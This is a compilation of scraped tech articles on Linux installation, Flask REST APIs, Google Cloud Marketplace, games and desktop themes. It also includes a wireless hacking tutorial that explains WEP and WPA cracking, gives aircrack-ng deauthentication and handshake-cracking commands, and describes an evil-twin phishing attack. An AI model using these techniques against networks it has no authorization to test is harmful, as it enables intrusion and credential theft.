Debian 8.8 MATE Installation on Oracle VirtualBox

This video tutorial shows the Debian 8.8 MATE Desktop installation on Oracle VirtualBox step by step. The tutorial is also helpful for installing Debian 8.8 on physical computer or laptop hardware. We also install Guest Additions on Debian 8.8 MATE Desktop for better performance and usability features: automatic resizing of the guest display, shared folders, seamless mode, shared clipboard, improved performance, and drag and drop.

Debian GNU/Linux 8.8 MATE Desktop Installation Steps:

  1. Create Virtual Machine on Oracle VirtualBox
  2. Start Debian 8.8 MATE Desktop Installation
  3. Install Guest Additions
  4. Test Guest Additions Features: Automatic Resizing Guest Display and Shared Clipboard

Installing Debian 8.8 MATE Desktop on Oracle VirtualBox

 

Debian 8.8 New Features and Improvements

Debian GNU/Linux 8.8 mainly adds corrections for security problems to the stable release, along with a few adjustments for serious problems. Security advisories were already published separately and are referenced where available. Those who frequently install updates from security.debian.org won't have to update many packages, as most of those updates are included in this point release. Debian 8.8 is not a new version of Debian; it's just a Debian 8 image with the latest updates of some of the packages. So, if you're running a Debian 8 installation with all the latest updates installed, you don't need to do anything.

Debian Website:

https://www.debian.org/

What is MATE Desktop?

The MATE Desktop Environment is the continuation of GNOME 2. It provides an intuitive and attractive desktop environment using traditional metaphors for Linux and other Unix-like operating systems. MATE is under active development to add support for new technologies while preserving a traditional desktop experience.

MATE Desktop Website:

http://mate-desktop.com/

Hope you found this Debian 8.8 MATE Desktop installation on Oracle VirtualBox tutorial helpful and informative. Please consider sharing it. Your feedback and questions are welcome!

Source

How to install Ubuntu 18.04 LTS

(Last Updated On: September 1, 2018)

PREPARATION

1. Create bootable DVD or USB media.

* Download ISO image from https://www.ubuntu.com/download/desktop
* You can burn a bootable DVD in Windows 7 and up simply by inserting a blank DVD, then right-clicking the ISO file and choosing “Burn disc image”.
* Creating a bootable USB drive will require you to install software. Find out more here: https://tutorials.ubuntu.com/tutorial/tutorial-create-a-usb-stick-on-windows#0 for Windows users and https://tutorials.ubuntu.com/tutorial/tutorial-create-a-usb-stick-on-macos#0 for Mac users.

2. Boot Ubuntu 18.04

* You will have to turn off Secure Boot in your computer’s BIOS settings to be able to boot from a DVD or USB drive.
* Once you get Ubuntu booted, select “Try Ubuntu” and take time to play around and ensure that all of your hardware is working properly.
* Check to see if you will need any proprietary drivers for your system.

3. Backup ALL Data You Wish To Keep!

* Do NOT use commercial backup software or the built-in Windows backup utility! Ubuntu MUST be able to read the files you create.
* Backups MUST be stored on a USB drive or other removable media.
* It is OK to store backup data in a Zip file. Ubuntu can open them with Archive Manager.

INSTALLATION

WARNING! Proceed at your own risk. Installing Ubuntu will wipe out your current Windows installation and all data you have stored on the computer. There is no way to “uninstall” Ubuntu!
* It is a good idea to have another computer, smartphone or tablet available so you can have access to the Internet in case you need to look something up.
* Turn off Secure Boot in your computer’s BIOS settings.
* Hook computer to the Internet with an Ethernet cable if drivers will be needed to use Wi-Fi.
* Boot Ubuntu
* Launch Ubuntu’s installer and follow the directions.
* Restart the computer. You are now running Ubuntu!

POST-INSTALLATION SETUP

* Review and change settings for Software Updater.
* Change to local mirrors (Optional)
* Install ALL updates and restart the computer.
* Check for and install drivers.
* Restart the computer again.
* Install GNOME Tweaks
sudo apt install gnome-tweak-tool
* Configure the Desktop
* Setup Timeshift:
sudo apt-add-repository -y ppa:teejee2008/ppa
sudo apt install timeshift
* Optional: Install Google Chrome browser: https://www.google.com/chrome/index.html
Here’s how to activate and install GNOME Extensions with Chrome and Firefox: https://linuxconfig.org/how-to-install-gnome-shell-extensions-on-ubuntu-18-04-bionic-beaver-linux
* Install Ubuntu Restricted Extras:
sudo apt install ubuntu-restricted-extras
* Remove Fluendo mp3 codec:
sudo apt remove gstreamer1.0-fluendo-mp3
* Install GNOME Tracker for faster file operations in Nautilus:
sudo apt install tracker
* Update the locate command database to activate the search function. (This command will be run automatically in about a day or so. Running it now is optional.)
sudo updatedb

More recommended software:
sudo apt install htop gdebi synaptic net-tools

Ubuntu is now fully ready to use. Have fun!

Please be sure to give EzeeLinux a ‘Like’ on Facebook! Thanks! https://www.facebook.com/EzeeLinux

Joe Collins

Joe Collins worked in radio and TV stations for over 20 years, where he installed, maintained and programmed computer automation systems. Joe also worked for Gateway Computer for a short time as a Senior Technical Support Professional in the early 2000s, and has offered freelance home computer technical support and repair for over a decade.

Joe is a fan of Ubuntu Linux and Open Source software and recently started offering Ubuntu installation and support for those just starting out with Linux through EzeeLinux.com. The goal of EzeeLinux is to make Linux easy for newcomers and start them on the right foot so they can have the best experience possible.

Joe lives in historic Portsmouth, VA in a hundred year old house with three cats, three kids and a network of computers built from scrounged parts, all happily running Linux.

Source

Creating REST API in Python

REST, or Representational State Transfer, is a software architectural style used mainly in API (Application Programming Interface) design to build interactive and modern web services. A service built this way is also known as a RESTful web service.

Python is a powerful programming language with many libraries for building REST or RESTful APIs. One of the popular libraries for building web apps and writing REST APIs is Flask.

In this article, I will show you how to create a REST API in Python using Flask. Let's get started.

You should have

  • Python 2 or Python 3 installed on your computer.
  • PIP or PIP3 installed on your computer.
  • A basic understanding of the Python programming language.
  • A basic understanding of executing commands in the shell.

You should be able to find articles and tutorials on all these topics on LinuxHint.com

I will be using Python 3 on Debian 9 Stretch in this article. If you're using Python 2, you will have to adjust a little bit. You should be able to figure it out yourself, as it will be as simple as writing python instead of python3 and pip instead of pip3.

Setting Up Virtual Environment:

To put it simply, a virtual environment is used to isolate one Python app from another. The Python package used to do that is virtualenv.

You can easily install virtualenv using PIP on your computer with the following command:

$ sudo -H pip3 install virtualenv

Now create a project directory (let’s call it pyrest/) with the following command:
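$ mkdir pyrest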

Now create a Python virtual environment on the pyrest/ project directory with the following command:
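$ virtualenv pyrest/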

Now navigate into the project directory with the following command:
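$ cd pyrest/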

Then, activate the Python virtual environment with the following command:
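$ source bin/activate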

Finally, run the following command to install the Flask Python library:
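$ pip install flask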

Writing Your First Flask Script:

In this section, I will write a hello world program in Python Flask.

First, create a file hello.py in your project directory:
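$ touch hello.py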

Now add the following lines to hello.py file and save it.
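A minimal version looks like this (the greeting text is illustrative):

from flask import Flask

app = Flask(__name__)

@app.route('/')
def hello():
    # respond to requests for the root URL
    return 'Hello World!'

if __name__ == '__main__':
    # run the development server on port 8080, as referenced below
    app.run(host='127.0.0.1', port=8080, debug=True)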

In the next section, I will show you how to run Flask scripts.

Running Flask Script:

Now to start the hello.py Flask server, run the following command:
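$ python3 hello.py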

As you can see, the server has started on http://127.0.0.1:8080.

Now, you can access the Flask server at http://127.0.0.1:8080 from a web browser or API testing software such as Postman. I am going to use curl.

$ curl http://127.0.0.1:8080

As you can see, the correct output is printed on the screen.

Congrats! Flask is working.

Accessing Data Using GET in REST API:

GET request on REST API is used to fetch information from the API server. You set some API endpoints and do a GET request on that end point. It’s simple.

First, create a new file get.py in your project directory with the following command:
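$ touch get.py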

Now add the following lines in your get.py file and save it.
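A version of get.py consistent with the line-by-line walkthrough below looks like this (the dummy account data is illustrative; the layout matches the line numbers referenced):

from flask import Flask, jsonify

app = Flask(__name__)

accounts = [
    {'name': 'Alice', 'balance': 100},
    {'name': 'Bob', 'balance': 200}
]

@app.route('/accounts', methods=['GET'])
def getAccounts():
    return jsonify(accounts)

if __name__ == '__main__':
    app.run(host='127.0.0.1', port=8080, debug=True)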

Here, on line 1, the Flask constructor function and the jsonify function are imported from the flask module.

On line 3, a Flask object is created and stored in the app variable.

On line 5, I created a Python array of dictionaries with some dummy data and stored it in the accounts variable.

On line 10, I defined the API endpoint /accounts and the request method, which is GET.

On line 11, I defined the function getAccounts(). The getAccounts() function will execute when a GET request is made to the /accounts endpoint.

On line 12, which is part of the getAccounts() function, I converted the accounts array of dictionaries to JSON using the jsonify() function and returned it.

On lines 14-15, I called app.run() to tell Flask to run the API server on port 8080.

Now run the Flask API server with the following command:
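$ python3 get.py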

The server has started on port 8080.

Now make a GET request to the /accounts endpoint with curl as follows:

$ curl http://127.0.0.1:8080/accounts

As you can see, the accounts data is displayed in JSON format when a GET request is made to the /accounts endpoint.

You can also get specific account data. To do that, I am going to create another API endpoint, /account/<id>. Here, <id> will be the ID of the account holder. The ID is simply the index of the array.

Edit the get.py script and add the marked lines to it.
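The added route looks roughly like this (lines 14-17 of the updated script):

@app.route('/account/<id>', methods=['GET'])
def getAccount(id):
    id = int(id) - 1
    return jsonify(accounts[id])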

Here, on line 14, I defined the API endpoint /account/<id> and the method to be used, which is GET.

On lines 15-17, the function getAccount() for the API endpoint /account/<id> is defined. The getAccount() function accepts id as an argument. The value of <id> from the API endpoint is passed to the id variable of the getAccount() function.

On line 16, the id variable is converted to an integer. I also subtracted 1 from the id variable, because the array index starts from 0 while I want the account IDs to start from 1. So if I put 1 as the account <id>, 1 – 1 = 0, and I get the element at index 0 of the accounts array.

On line 17, the array element at that index is returned as JSON.

The rest of the code is the same.

Now run the API server again.
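$ python3 get.py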

I requested the data for accounts 1 and 2 separately, and I got the expected output, as you can see below.

$ curl http://127.0.0.1:8080/account/1
$ curl http://127.0.0.1:8080/account/2

Adding Data Using POST in REST API:

Now I am going to rename get.py to api.py and add an API endpoint /account for adding new data.

Rename get.py to api.py:
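$ mv get.py api.py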

First, add the lines (19-26) shown below to the api.py file.
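The added lines look roughly like this (note that request must also be imported from the flask module on line 1):

@app.route('/account', methods=['POST'])
def addAccount():
    account = request.get_json()  # parse the JSON body of the POST request
    accounts.append(account)
    return jsonify(accounts)

if __name__ == '__main__':
    app.run(host='127.0.0.1', port=8080, debug=True)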

Now run the api.py server:
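$ python3 api.py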

To insert new data into the /account endpoint, run the following command:

$ curl -X POST -H "Content-Type: application/json" -d '{"name": "Shovon", "balance": 100}' http://127.0.0.1:8080/account

NOTE: Here, '{"name": "Shovon", "balance": 100}' is the JSON input data.

The data should be inserted.

As you can see, the new data is added.

That's it for this article. Thanks for reading!

Source

Google Adds Kubernetes to Rebranded Cloud Marketplace

Google’s goal is to make containers accessible to everyone, especially the enterprise, according to Anil Dhawan, product manager for the Google Cloud Platform.

When Google released Kubernetes as open source, one of the first challenges that the industry tackled was management, he said.

Google’s hosted Kubernetes Engine takes care of cluster orchestration and management. A bigger challenge is getting apps running on a Kubernetes cluster, which can be a manual, time-consuming process. GCP Marketplace provides prepackaged apps and deploys them onto any cluster, Dhawan noted.

Google makes the process safer by testing and vetting all Kubernetes apps listed on GCP Marketplace. That process includes vulnerability scanning and partner agreements for maintenance and support.

The security umbrella extends to all solutions available through the marketplace. That includes virtual machines, managed services, data sets, application programming interfaces, and Software as a Service.

The name change at one level is purely an effort to heighten the visibility of the Google Cloud Platform brand and to point attention to the new marketplace for ready-to-deploy apps, suggested Charles King, principal analyst at Pund-IT.

“Ideally, it will move interested businesses toward the marketplace, meaning that developers will see improved sales of their apps for GCP,” he told LinuxInsider.

More Behind the Move

Ultimately, Google’s enterprise cloud platform rebranding should make life easier for people managing container environments, said King. That will be the case especially if they happen to be studying or considering apps to buy and deploy.

“The impact on hybrid/multicloud is a bit harder to parse, though,” said King. “If the effort succeeds, it should impact Google’s GCP-related sales and business for the better.”

Google’s marketing move could be important for the future of hybrid and multicloud strategies, said Glen Kosaka, vice president of product at Kubernetes security firm NeuVector.

“This is one really important step towards supporting and simplifying app deployment across clouds,” he told LinuxInsider.

Further, developers now have access to apps that can boost their own apps without having to worry about production deployment and scaling issues, noted Kosaka.

That should be a big deal to many devs, he added.

“Container management of marketplace apps now becomes more simplified, and customers — those responsible for container management — have the confidence that these Google Marketplace apps are tested and compatible with their cloud infrastructure,” Kosaka said.

Broader View Counts

Looking at the news in a strict and narrow sense, Google’s action appears to be little more than a rebranding with a clearer, more descriptive name. That is a fairly sensible move, suggested Alex Gounares, CEO of Polyverse.

“From a broader perspective, this is the proverbial tip of the iceberg around a series of much bigger industry shifts to server-less computing and Containers as a Service,” he told LinuxInsider.

For one thing, Google’s rebranded platform means changes for developers. In the Internet’s early years, you had to build your own data centers, and build and manage your own applications. Effectively, everything was hand-built, on-premises and expensive, Gounares explained.

Then Salesforce.com came along, and the Software as a Service revolution was born. The same apps could be run in the cloud and delivered via a Web page.

That led to Amazon Web Services and to other cloud services providers letting folks effectively rent a data center on demand — the Infrastructure as a Service revolution.

For the application developer, physically acquiring the hardware became trivial, but from a software perspective, actually getting everything set up, configured and running was essentially just as complicated as running things on premises, said Gounares.

Big Deal for Devs

Containers have revolutionized that. Now all of the complexity of something like a database or content management system or similar software can be packaged in a neat little box, according to Gounares.

That box can run alongside all the other pieces needed for a full solution. Configuration and management that used to take days or weeks to accomplish now can be done in a single command line.

“Renaming the service to address making one-click deployment of containers, and to open up new business models for software platform technology is a big, big, big deal,” remarked Gounares. “It is doing for software what Amazon AWS did for hardware and data centers.”

Deployment Factors

A big advantage to containers is their portability across environments. Users can develop their content and then move their workloads to any production environment, noted Google’s Dhawan.

Google works with open source Special Interest Groups, or SIGs, to create standards for Kubernetes apps. This brings the expertise of the open source community to the enterprise.

Google’s enhanced cloud platform speeds deployment on Kubernetes clusters, Kubernetes Engine, on-premises servers or other public clouds. A Marketplace window displays directly in the Kubernetes Engine console. The process involves clicking to deploy and specifying the location.

Third-party partners develop commercial Kubernetes apps, which come with support and usage-based billing on many parameters, such as API calls, number of hosts, and storage per month.

Google uses simplified license usage and offers more consumption options. For instance, the usage charges for apps are consolidated and billed through GCP, no matter where they are deployed. However, the non-GCP resources on which they run are not included, according to Dhawan.

A Win-Win Proposition

It is going to be orders of magnitude easier for developers to deploy both commercial and open source applications on Kubernetes. The launch of GCP Marketplace solves problems around scalability, operating in a virtual private cloud, and billing, noted Dan Garfield, chief evangelist at Codefresh.

“For example, with Codefresh, our users can deploy our hybrid agent on Kubernetes so they can build on their own clusters, access code in their virtual private network, and bill everything through Google,” he told LinuxInsider. “As a third party, this makes the billing PO approval process a lot easier with enterprise customers where you normally have to become an approved vendor.”

For those responsible for container management, it means DevOps teams can consume “official” versions of software built for Kubernetes and keep them up to date, he added. This is especially important when you consider the security issues people have had with Dockerhub.

“The GCP Marketplace supports much more complex software stacks, and you can get the official packages rather than whatever someone has built and pushed to Dockerhub,” Garfield said.

What’s Available

GCP Marketplace features popular open source projects that are ready to deploy into Kubernetes. Each app includes clustered images and documented upgrade steps. This makes them ready to run in production. Packaged and maintained by Google Cloud, they implement best practices for running on Kubernetes Engine and GCP, according to Google.

Here is a sampling of some of the hundreds of apps featured on the GCP Marketplace:

  • WordPress for blogging and content management;
  • InfluxDB, Elasticsearch and Cassandra for big data and database;
  • Apache Spark for big data/analytics;
  • RabbitMQ for networking; and
  • NGinx for Web serving.

A complete listing of apps available on the GCP Marketplace is available here. No signup is needed to view the full list of available solutions.

Good for Hybrid and Multicloud Too

Anything that creates an additional wave of cloud-native applications is really great for the entire cloud marketplace. This includes different public cloud vendors, private cloud solutions, and even edge computing vendors, according to Roman Shaposhnik, VP for product & strategy at Zededa.

“The platform can only be as successful as the number of killer apps that it hosts. This move by Google creates just the right kind of dynamics to get us the next crop of candidates for a killer cloud-native app,” he told LinuxInsider.

Hybrid cloud and multicloud deployments still have some way to go, however. What is missing is a way to seamlessly stretch container orchestrators across geographically distant locations, suggested Gaurav Yadav, founding engineer and product manager at Hedvig.

“Unless we standardize container management operations across data centers and cloud locations separated by an unreliable network, true cloud-agnostic applications will always be hard to materialize,” he told LinuxInsider.

VMware became the de facto standard for virtual machine management because it took it out of the hands of admins, Yadav said. VMware made it simple, automated and scalable.

“For cloud-native applications, containers have the potential of replacing VMs as the standard for resource virtualization,” he suggested. “This is only possible if we bring the advanced capabilities that have been built over a decade for VM orchestration to container management. This announcement is the next step toward this goal.”

The Right Move

Fundamentally, Google’s actions create a huge incentive for developers to transition their apps to a cloud-native architecture, said Zededa’s Shaposhnik.

“I would expect all of these to start being refactored and packaged for the GCP Marketplace,” he said, “and that is a good thing that goes way beyond immediate value on Google’s own cloud. Once an application is refactored and packaged to be truly cloud-native, you can transition between different clouds — including on-premises private clouds — in a much easier fashion.”

For container management, it is “yet another move in the right direction of making containers a ubiquitous, but completely invisible part of the IT infrastructure,” Shaposhnik added.

The Bottom Line

The changes that Google implemented are good news for developers, said Oleg Atamanenko, lead platform developer at Kublr.

“It is a big step towards simplifying the experience when trying new applications,” he told LinuxInsider.

For IT management, on the other hand, the changes in Google’s GCP Marketplace mean cost reduction, reduced time-to-market, and faster innovation through streamlining application installation, Atamanenko said.

For developers, a change in name means little, but the direction Google has taken means a step forward in the enterprise world, said Stefano Maffulli, community director at Scality.

Still, there is a down side, he told LinuxInsider.

Bitnami, which has been pushing to be the packaging tool to ship applications to the clouds, added support for Kubernetes early on.

“Now Google is making them less relevant on GCP, which can be a threat,” said Maffulli. “I wonder how long Bitnami and Google will stay partners.”

Jack M. Germain has been an ECT News Network reporter since 2003. His main areas of focus are enterprise IT, Linux and open source technologies. He has written numerous reviews of Linux distros and other open source software.

Source

Things You Should Know : Wireless Hacking Intermediate

In the previous post in the ‘things you should know’ series, I discussed Wireless Hacking basics. It’s recommended that you go through it before starting this tutorial.

Pre-requisites

You should know (all this is covered in Wireless Hacking basics)-

  • The different flavors of wireless networks you’ll encounter, and how difficult it is to hack each of them.
  • What hidden networks are, and whether they offer a real challenge to a hacker.
  • Very roughly, how each of the various ‘flavors’ of wireless networks is actually hacked.

Post-reading

You will know –

  • Even more about the different flavors of wireless networks.
  • How to go about hacking any given wireless network.
  • Common tools and attacks that are used in wireless hacking.
  • A rough idea of the cryptographic aspects of the attacks, the vulnerabilities and the exploits.
  • A rough idea of the cryptographic aspects of each ‘flavor’ of wireless network security.

Most of these points will be covered in detail in the coming posts.

Pirates of the Caribbean

Suppose you are in the ship manufacturing business, in times when pirates rampage the seas. You observed how the merchant ships all float unguarded on the seas, and how the pirate industry is booming because of easy targets. You decided to create fortified ships, which can defend themselves against the pirates. For this, you used an alloy X. Your idea was appreciated by merchants, and everyone started using your ships….

The most iconic pirates of modern times

Unfortunately, your happiness was short-lived. Soon, the pirates discovered flaws in your ships, and any pirate who knew what he was doing could easily get past your ship’s defense mechanisms. For a while you tried to fix the known weaknesses in the ship, but soon realized that there were too many problems, and that the very design of the ship was flawed.

You knew what flaws the pirates were exploiting, and could build a new and stronger ship. However, the merchants weren’t willing to pay for new ships. You then found out that by remodeling some parts of the ship in a very cost-efficient way, you could make the ship’s security almost impenetrable. In the coming years, some pirates found a few structural weaknesses in alloy X, and some issues with the core design of the ship (remnant weaknesses of the original ship). However, these weaknesses were rare, and your customers were overall happy.

After some time you decided to roll out an altogether new model of the ship. This time, you used a stronger alloy, Y. Also, you knew all the flaws in the previous versions of the ship, and didn’t make any errors in the design this time. Finally, you had a ship which could withstand constant bombardment for months on end without collapsing. There was still scope for human error, as the sailors can sometimes be careless, but other than that, it was an invincible ship.

WEP, WPA and WPA-2

WEP is the flawed ship in the above discussion. The aim of the Wireless Alliance was to write an algorithm to make wireless networks (WLAN) as secure as wired networks (LAN). This is why the protocol was called Wired Equivalent Privacy (privacy equivalent to that expected in a traditional wired network). Unfortunately, while in theory the idea behind WEP sounded bullet-proof, the actual implementation was very flawed. The main problems were static keys and weak IVs. For a while attempts were made to fix the problems, but nothing worked well enough (WEP2, WEPplus, etc. were made, but all failed).

WPA was a new WLAN standard which was compatible with devices using WEP encryption. It fixed pretty much all the flaws in WEP encryption, but the limitation of having to work with old hardware meant that some remnants of WEP’s problems would still continue to haunt WPA. Overall, however, WPA was quite secure. In the above story, this is the remodeled ship.

WPA-2 is the latest and most robust security algorithm for wireless networks. It wasn’t backwards compatible with many older devices, but these days all new devices support WPA-2. This is the invincible ship: the new model made with a stronger alloy.

But wait…

In the last tutorial I assumed WPA and WPA-2 are the same thing. In this one, I’m telling you they are quite different. What’s the matter?

Well actually, the two standards are indeed quite different. However, while it’s true there are some remnant flaws in WPA that are absent in WPA-2, from a hacker’s perspective the technique to hack the two networks is often the same. Why?

  • Very few tools exist which carry out the attacks against WPA networks properly (the absence of proof-of-concept scripts means that you have to do everything from scratch, which most people can’t).
  • All these attacks work only under certain conditions (the key renewal period must be large, QoS must be enabled, etc.).

Because of these reasons, despite WPA being a little less secure than WPA-2, most of the time a hacker has to use brute-force/dictionary attacks and the other methods that he would use against WPA-2, practically making WPA and WPA-2 the same thing from his perspective.

PS: There’s more to the WPA/WPA-2 story than what I’ve captured here. Actually, WPA and WPA-2 are ambiguous descriptions, and the actual intricacy (PSK, CCMP, TKIP, X/EAP, AES with respect to the cipher and authentication used) would require diving further into the personal and enterprise versions of both WPA and WPA-2.

How to Hack

Now that you know the basics of all these networks, let’s get to how these networks are actually hacked. I will only name the attacks; further details will be provided in coming tutorials-

WEP

The initialization vector (IV) passed to the RC4 cipher is the weakness of WEP

Most of the attacks rely on inherent weaknesses in IVs (initialization vectors). Basically, if you collect enough of them, you will get the password.

  1. Passive method
    • If you don’t want to leave behind any footprints, then the passive method is the way to go. In this, you simply listen on the channel the network is on, and capture the data packets (airodump-ng). These packets will give you IVs, and with enough of them, you can crack the network (aircrack-ng). I already have a tutorial on this method, which you can read here – Hack WEP using aircrack-ng suite.
  2. Active methods
    • ARP request replay – The passive method can be incredibly slow, since you need a lot of packets (there’s no way to say how many; it can literally be anything due to the nature of the attack, though usually the number of packets required ends up in 5 digits). Getting that many packets can be time consuming. However, there are many ways to speed up the process. The basic idea is to initiate some sort of conversation in the network, and then capture the packets that arise as a result of the conversation. The problem is, not all packets have IVs. So, without having the password to the AP, you have to make it generate packets with IVs. One of the best ways to do this is by replaying ARP packets (which have IVs and can be generated easily once you have captured at least one ARP packet). This attack is called the ARP replay attack. We have a tutorial for this attack as well, ARP request replay attack (see the example session just after this list).
    • Chopchop attack
    • Fragmentation attack
    • Caffe Latte attack
I’ll cover all these attacks in detail separately (I really can’t summarize the bottom three). Let’s move on to WPA-

WPA-2 (and WPA)

There are no vulnerabilities here that you can easily exploit. The only two options we have are to guess the password or to fool a user into giving us the password.

  1. Guess the password – For guessing something, you need two things: guesses (duh) and validation. Basically, you need to be able to make a lot of guesses, and also be able to verify whether they are correct or not. The naive way would be to enter the guesses into the password field that your OS provides when connecting to the wifi. That would be slow, since you’d have to do it manually. Even if you write a script for that, it would take time, since you have to communicate with the AP for every guess (multiple times for each guess, in fact). Basically, validation by asking the AP every time is slow. So, is there a way to check the correctness of our password without asking the AP? Yes, but only if you have a 4-way handshake. Basically, you need to capture the series of packets transmitted when a valid client connects to the AP. If you have these packets (the 4-way handshake), then you can validate your password guesses against them (see the example session after this list). More details on this later, but I hope the abstract idea is clear. There are a few different ways of guessing the password :-
  • Bruteforce – Tries all possible passwords. It is guaranteed to work, given sufficient time. However, even for alphanumeric passwords of length 8, bruteforce takes incredibly long. This method might be useful if the password is short and you know that it’s composed only of numbers.
  • Wordlist/Dictionary – In this attack, there’s a list of words which are possible candidates for the password. These wordlist files contain English words, combinations of words, misspellings of words, and so on. There are some huge wordlists that are many GBs in size, and many networks can be cracked using them. However, there’s no guarantee that the password of the network you are trying to crack is in the list. These attacks complete within a reasonable timeframe.
  • Rainbow table – The validation process against the 4-way handshake that I mentioned earlier involves hashing the plaintext password, which is then compared with the hash in the handshake. However, hashing (WPA uses PBKDF2) is a CPU-intensive task and is the limiting factor in the speed at which you can test keys (this is the reason why there are so many tools which use the GPU instead of the CPU to speed up cracking). Now, a possible solution is for the person who created the wordlist/dictionary we are using to also convert the plaintext passwords into hashes, so that they can be checked directly. Unfortunately, WPA-2 uses a salt while hashing, which means that two networks with the same password can have different hashes if they use different salts. How does WPA-2 choose the salt? It uses the network’s name (SSID) as the salt. So two networks with the same SSID and the same password would have the same salt. Now the guy who made the wordlist has to create separate hashes for all possible SSIDs. In practice, hashes are generated for the most common SSIDs (the default ones when a router is purchased, like linksys, netgear, belkin, etc.). If the target network has one of those SSIDs, then the cracking time is reduced significantly by using the precomputed hashes. This precomputed table of hashes is called a rainbow table. Note that these tables are significantly larger than the wordlists. So, while we saved ourselves some time while cracking the password, we had to use a much larger file (some are 100s of GBs) instead of a smaller one. This is referred to as a time-memory tradeoff. This page has rainbow tables for the 1000 most common SSIDs.

 

  • Fool a user into giving you the password – Basically, this is just a combination of man-in-the-middle and social engineering attacks. More specifically, it is a combination of evil twin and phishing. In this attack, you first force a client to disconnect from the original WPA-2 network, then force him to connect to a fake open network that you create, and then send him a login page in his browser where you ask him to enter the password of the network. You might be wondering: why do we need to keep the network open and then ask for the password in the browser (can’t we just create a WPA-2 network and let the user give us the password directly)? The answer lies in the fact that WPA-2 performs mutual authentication during the 4-way handshake. Basically, the client verifies that the AP is legit and knows the password, and the AP verifies that the client is legit and knows the password (throughout the process, the password is never sent in plaintext). As the attacker, we simply don’t have the information necessary to complete the 4-way handshake.
  • Bonus: WPS vulnerability and reaver [I have covered it in detail separately, so I’m not explaining it again (I’m only human, and a very lazy one too)]

 

The WPA-2 4-way handshake procedure. Both the AP and the client authenticate each other
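To make the capture-then-guess workflow concrete, a typical handshake capture and dictionary attack with the aircrack-ng suite looks roughly like this (the interface, channel, AP MAC address and wordlist are placeholders):

$ airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpadump wlan0mon   # watch the AP and capture the 4-way handshake
$ aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon             # kick a client so it reconnects and hands you the handshake
$ aircrack-ng -w wordlist.txt wpadump-01.cap                       # test every wordlist entry against the captured handshake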

Tools (Kali)

In this section I’ll name some common tools in the wireless hacking category which come preinstalled in Kali, along with the purpose they are used for.

  1. Capture packets
    • airodump-ng
    • wireshark (a really versatile tool; there are entire books covering just this tool for packet analysis)
  2. WPS
    • reaver
    • pixiewps (performs the “pixie dust attack”)
  3. Cool tools
    • aireplay-ng (WEP mostly)
    • mdk3 (cool stuff)
  4. Automation
    • wifite
    • fluxion (actually it isn’t a common script at all, but since I wrote a tutorial on it, I’m linking it)

You can find more details about all the tools installed on the Kali Tools page.

Okay guys, this is all that I had planned for this tutorial. I hope you learned a lot. We will delve into further depths in coming tutorials.

Source

Stranded Deep adds a new experimental couch co-op mode to survive together

Fancy surviving on a desert island with a friend? That’s now possible with a new experimental build of Stranded Deep [Steam].

To go along with this new feature, they also added a player ragdoll for when you’re knocked out or dead. Your partner can help you up with bandages before you bleed out, and bodies can be dragged as well, for maximum fun. It’s good to see them add more from their roadmap, with plenty more still to come before it leaves Early Access.

They also added a Raft Passenger Seat, fixed a bunch of bugs and updated Unity to “2017.4.13f1”. Also, the shark music won’t play until you’re actually attacked, so no more early warnings for you.

To access it, you will need to opt-in to the “experimental” Beta on Steam.

Source

Canta: Best Theme And Icons Pack Around For Ubuntu/Linux Mint – NoobsLab

If you are a person who changes themes on your Linux system frequently, then you are on the right page. Today we present one of the best themes under development for Ubuntu 18.04/Linux Mint 19. It has light and dark variants with different styles: normal, compact and square. Whether you are a fan of material design or not, you are most probably going to like this theme and icon pack. The initial release of Canta was back in March 2018, and it is released under the GNU General Public License V3.

The Canta theme is based on the Materia GTK theme.

This pack mainly targets the GNOME Shell desktop but can be used on other desktops as well, such as Cinnamon, Xfce, MATE, etc. The Canta icons are supplied in the same pack and designed by the same author. Both the theme and the icons are available in our PPAs. Basically, these icons are designed to go with this theme pack, but you can use them with any theme. Via our PPAs, the theme is available for Ubuntu 18.10/18.04 and Linux Mint 19, and the icons are available for Ubuntu 18.10/18.04/16.04/14.04 and Linux Mint 19/18/17. If you find any kind of bug or problem with this theme, report it to the author and it will get fixed in the next update.

Available for Ubuntu 18.10/18.04 Bionic/Linux Mint 19/and other Ubuntu derivatives
To install Canta themes in Ubuntu/Linux Mint open Terminal (Press Ctrl+Alt+T) and copy the following commands in the Terminal:
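The commands should look roughly like this (the PPA and package names are assumed here):

sudo add-apt-repository ppa:noobslab/themes    # assumed PPA
sudo apt-get update
sudo apt-get install canta-theme               # assumed package name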
Available for Ubuntu 18.10/18.04 Bionic/16.04 Xenial/14.04 Trusty/Linux Mint 19/18/17/and other Ubuntu derivatives
To install Canta icons in Ubuntu/Linux Mint open Terminal (Press Ctrl+Alt+T) and copy the following commands in the Terminal:
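Again, roughly (PPA and package names assumed):

sudo add-apt-repository ppa:noobslab/icons     # assumed PPA
sudo apt-get update
sudo apt-get install canta-icons               # assumed package name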
Did you like this pack?

Source

How to Use RAR files in Ubuntu Linux

Last updated September 27, 2018

RAR is quite a good archive file format, but it isn’t the best when you’ve got 7-zip offering great compression ratios and Zip files being easily supported across multiple platforms by default. It is one of the most popular archive formats, but Ubuntu‘s archive manager does not support extracting RAR files, nor does it let you create RAR files.

Fret not, we have a solution for you. To enable support for extracting RAR files, you need to install UNRAR – which is freeware from RARLAB. And to create and manage RAR files, you need to install RAR – which is available as a trial.

RAR files in Ubuntu Linux

Extracting RAR Files

Unless you have it installed, extracting RAR files will show you the error “Extraction not performed“. Here’s how it looks (Ubuntu 18.04):

Error in RAR extraction in Ubuntu

If you want to resolve the error and easily be able to extract RAR files, follow the instructions below to install unrar:

-> Launch the terminal and type in:

sudo apt-get install unrar

-> After installing unrar, you may choose to type in “unrar” (without the inverted commas) to learn more about its usage and how to handle RAR files with it.

The most common usage would obviously be extracting the RAR file you have. So, you can either perform a right-click on the file and extract it from there, or you can do it via the terminal with the help of this command:

unrar x FileName.rar

You can see that in action here:

Using unrar in Ubuntu

If the file isn’t present in the Home directory, you have to navigate to the target folder using the “cd” command. For instance, if you have the archive in the Music directory, simply type in “cd Music” to navigate to the location and then extract the RAR file.

Creating & Managing RAR files

Using rar archive in Ubuntu Linux

UNRAR does not let you create RAR files. So, you need to install the RAR command-line tool to be able to create RAR archives.

To do that, you need to type in the following command:

sudo apt-get install rar

Here, we will help you create a RAR file. In order to do that, follow the command syntax below:

rar a ArchiveName File_1 File_2 Dir_1 Dir_2

When you type a command in this format, every listed item (including everything inside the listed directories) is added to the archive. If you want specific files, just mention the exact name/path.

By default, the RAR file is created in the directory you run the command from – the HOME directory in this case.

